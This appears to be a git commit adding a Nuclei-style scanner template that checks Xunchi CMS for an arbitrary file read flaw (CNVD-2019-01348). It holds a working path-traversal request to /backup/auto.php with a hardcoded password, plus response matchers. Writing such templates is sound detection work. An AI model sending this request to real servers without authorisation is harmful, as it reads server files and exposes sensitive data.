Create xunchi-file-read.yaml
parent
f10fcbcf2f
commit
525475ea2e
|
@ -0,0 +1,24 @@
|
|||
id: xunchi-file-read
|
||||
info:
|
||||
name: Xxunchi LFR (CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
part: body
|
||||
condition: and
|
Loading…
Reference in New Issue